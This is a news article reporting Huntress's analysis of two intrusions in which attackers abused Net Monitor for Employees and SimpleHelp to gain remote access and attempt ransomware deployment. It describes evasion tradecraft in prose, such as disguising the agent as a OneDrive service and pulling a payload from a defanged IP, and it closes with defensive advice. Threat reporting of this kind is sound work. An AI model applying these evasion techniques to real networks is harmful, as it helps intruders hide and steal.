Your supervisor may like using employee monitoring apps to keep tabs on you, but crims like the snooping software even more. Threat actors are now using legit bossware to blend into corporate networks and attempt ransomware deployment.
In late January and early February, the Huntress response team spotted two intrusions in which criminals chained Net Monitor for Employees Professional with remote monitoring and management (RMM) tool SimpleHelp, and then attempted to deploy ransomware on the victims’ computers.
While the crims were ultimately unsuccessful, the security incidents highlight how miscreants love to use legitimate, commercial software for nefarious purposes because it makes it easier for them to hide inside enterprise IT environments.
“RMMs and employee monitoring tools blend in amongst legitimate signed binaries,” Michael Tigges, senior security operations analyst at Huntress, told The Register, adding that “this is a rare case of the employee monitoring software being co-opted for subsequent access.”
While neither of the victims’ employers uses Net Monitor, repurposing this type of employee monitoring software falls into the “same category of RMM abuse,” Tigges said. “Delineating which may be malicious and benign at first glance is exceedingly difficult. Adversaries know this as well.”
The victims, we’re told, were from different industry sectors, and “likely targets of opportunity rather than any specifically targeted group,” he added.
This is a rare case of the employee monitoring software being co-opted for subsequent access
Tigges points out that “there are legitimate use cases for employee monitoring software – chiefly around data loss prevention.”
This particular brand of bossware, however, does a whole lot more than passive screen monitoring. It can also establish remote shell connections and remotely execute commands on users’ desktops. That makes it ideal for crims to use, even without modifying or infecting the installers.
“Threat actors leveraged this capability for hands-on-keyboard reconnaissance, additional tooling delivery, and deploying secondary remote access channels, effectively turning an employee monitoring tool into a fully functional RAT (remote access trojan),” Tigges and fellow threat hunters Anna Pham, Dray Agha, and Anton Ovrutsky wrote in a Wednesday blog.
As The Register previously reported, spying on workers is also bad for morale and doesn’t inspire loyalty to the company, not to mention that employer-sanctioned RATs are creepy as all hell.
Here’s what went down
In the first case that the Huntress team observed in late January, the attacker somehow installed Net Monitor for Employees on the victim’s machine. Huntress doesn’t know how the intruder gained initial access.
But once they had broken in, the criminals set to work manipulating user accounts via multiple net commands. This included attempting to identify valid usernames, reset passwords, and create new admin-user accounts on the host.
“As we kept pulling on investigative threads, we observed the ‘Net Monitor for Employees’ terminal pulling down a file via PowerShell named vhost.exe from the IP address of 160.191.182[.]41,” the threat hunters wrote.
The executable turned out to be SimpleHelp, which the attacker then used in multiple attempts to tamper with Windows Defender. When this wasn’t successful, the intruder tried to deploy multiple versions of Crazy ransomware linked to VoidCrypt.
In the second incident, which happened in early February, the attacker used a compromised third-party SSL VPN account to gain initial access to the victim’s computer. Next, they connected to a domain controller using remote desktop protocol, launched a PowerShell session, and installed the Net Monitor agent, configuring the reverse connection to call back to an attacker-controlled console.
Net Monitor allows users to customize the service and process names, and the intruder took advantage of this to disguise the agent as Microsoft OneDrive, registering the service as OneDriveSvc, naming the process OneDriver.exe, and renaming the running binary to svchost.exe.
Then, the intruder installed SimpleHelp and configured it to monitor for keywords that would indicate cryptocurrency wallets, exchanges, blockchain explorers, and payment platforms. This, Huntress notes, indicates “the threat actor’s financial motivation extends beyond ransomware to direct cryptocurrency theft.”
The SimpleHelp agent also monitored for remote tool access keywords including RDP, AnyDesk, TeamViewer, and VNC.
Meanwhile, they used Net Monitor for Employees Professional to perform network reconnaissance on the compromised domain controller, probe internal network segments, and map out the network settings.
Huntress says shared infrastructure used in both cases, plus the reuse of the vhost.exe filename and overlapping IP addresses, “strongly suggest” a single attacker or group behind the two intrusions.
And to prevent becoming the next victim, turn on multi-factor authentication (MFA) on all remote access services and external-facing applications, and limit remote access to only those users and systems that require it to do their jobs.
The security analysts also suggest conducting regular audits of all third-party RMM tools and employee monitoring software, and monitoring for any unusual process execution chains. ®